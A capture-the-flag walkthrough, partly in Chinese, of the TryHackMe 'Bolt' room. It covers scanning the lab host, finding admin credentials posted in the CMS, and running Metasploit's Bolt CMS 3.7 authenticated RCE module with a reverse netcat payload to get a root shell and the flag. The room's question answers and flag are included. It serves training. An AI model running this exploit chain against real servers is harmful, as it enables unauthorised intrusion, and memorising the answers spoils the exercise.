Bolt
Tag: Security, Web, Bolt, RCE
Task 1: Deploy the machine
This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution. You should wait for at least 3-4 minutes for the machine to start properly.
Start the machine
Target IP Address : 10.10.118.161
Kali Linux : 10.18.72.222
Task 2: Hack your way into the machine!
A hero is unleashed
Once you have successfully deployed the VM , enumerate it before finding the flag in the machine.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# nmap 10.10.118.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 02:59 EDT
Nmap scan report for 10.10.118.161
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
Nmap done: 1 IP address (1 host up) scanned in 49.00 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌──(root㉿kali)-[~]
└─# nmap -sV -p 22,80,8000 -sC 10.10.118.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 03:01 EDT
Nmap scan report for 10.10.118.161
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
| 256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_ 256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open http (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Thu, 10 Aug 2023 07:02:01 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: private, must-revalidate
| Date: Thu, 10 Aug 2023 07:02:01 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| X-Debug-Token: 4d16d0
| <!doctype html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| </head>
| <body>
| href="#main-content" class="vis
| GetRequest:
| HTTP/1.0 200 OK
| Date: Thu, 10 Aug 2023 07:02:00 GMT
| Connection: close
| X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
| Cache-Control: public, s-maxage=600
| Date: Thu, 10 Aug 2023 07:02:00 GMT
| Content-Type: text/html; charset=UTF-8
| X-Debug-Token: 40dd42
| <!doctype html>
| <html lang="en-GB">
| <head>
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Bolt | A hero is unleashed</title>
| <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
| <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
| <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
| <meta name="generator" content="Bolt">
| <link rel="canonical" href="http://0.0.0.0:8000/">
| </head>
|_ <body class="front">
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds
http://10.10.118.161:8000/
http://10.10.118.161:8000/entry/message-for-it-department
Message for IT Department
Written by Admin on Saturday July 18, 2020
Hey guys,
i suppose this is our secret forum right? I posted my first message for our readers today but there seems to be a lot of freespace out there. Please check it out! my password is boltadmin123 just incase you need it!
Regards,
Jake (Admin)
http://10.10.118.161:8000/entry/message-from-admin
Message From Admin
Written by Admin on Saturday July 18, 2020
Hello Everyone,
Welcome to this site, myself Jake and my username is bolt .I am still new to this CMS so it can take awhile for me to get used to this CMS but believe me i have some great content coming up for you all!
Regards,
Jake (Admin)
获得登录凭据:
username: bolt
password: boltadmin123
根据Boltcms的文档,登录页面为:http://10.10.118.161:8000/bolt/login
使用上述用户名和密码,成功登录Dashboard。
在页面左下角可以看到Web应用程序的版本信息:Bolt Version: 3.7.1,或者Bolt 3.7.1。
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
Bolt CMS 3.7.0 - 认证远程代码执行
描述
该模块利用了Bolt CMS版本3.7.0和3.6.*中的多个漏洞,以便将任意命令作为运行Bolt的用户执行。该模块首先利用一个漏洞,允许经过身份验证的用户将/bolt/profile中的用户名更改为PHP system($_GET[""]) 变量。接下来,模块从/async/browse/cache/.sessions获取令牌列表,并使用这些令牌通过HTTP POST请求到/async/folder/rename创建具有被列入黑名单的.php扩展名的文件。对于每个创建的文件,模块检查HTTP响应,以查看是否可以通过创建的PHP $_GET变量执行任意命令。如果响应为否定,则删除该文件,否则通过以下格式的HTTP get请求执行有效负载:/files/?<$_GET_var>= 需要Bolt CMS用户的有效凭据。此模块已在运行于CentOS 7上的Bolt CMS 3.7.0上进行了成功测试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 > search Bolt
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/bolt_authenticated_rce 2020-05-07 great Yes Bolt CMS 3.7.0 - Authenticated Remote Code Execution
1 exploit/multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/bolt_file_upload
msf6 > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/bolt_authenticated_rce) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options
Module options (exploit/unix/webapp/bolt_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
FILE_TRAVERSAL_PATH ../../../public/files yes Traversal path from "/files" on the web server to "/root" on the server
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 8000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Bolt CMS
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes Username to authenticate with
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 Linux (cmd)
View the full module info with the info, or info -d command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf6 exploit(unix/webapp/bolt_authenticated_rce) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "goxmdd".
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file ubarzzmqcgc.php.
[+] Deleted file blwtcrohf.php.
[+] Used token b9177f20deed265f891752d759 to create ffdqnvgwft.php.
[*] Attempting to execute the payload via "/files/ffdqnvgwft.php?goxmdd=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.18.72.222:4444 -> 10.10.118.161:47724) at 2023-08-10 03:56:24 -0400
[+] Deleted file ffdqnvgwft.php.
[+] Reverted user profile back to original state.
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
find / -name flag.txt 2>/dev/null
/home/flag.txt
cat /home/flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
Answer the questions below
What port number has a web server with a CMS running?
8000
What is the username we can find in the CMS?
bolt
What is the password we can find for the username?
boltadmin123
What version of the CMS is installed on the server? (Ex: Name 1.1.1)
Bolt 3.7.1
There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?
48296
Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit? (Ex: exploit/….)
Note: If you can’t find the exploit module its most likely because your metasploit isn’t updated. Run apt update then apt install metasploit-framework
exploit/unix/webapp/bolt_authenticated_rce
Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
Look for flag.txt inside the machine.
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
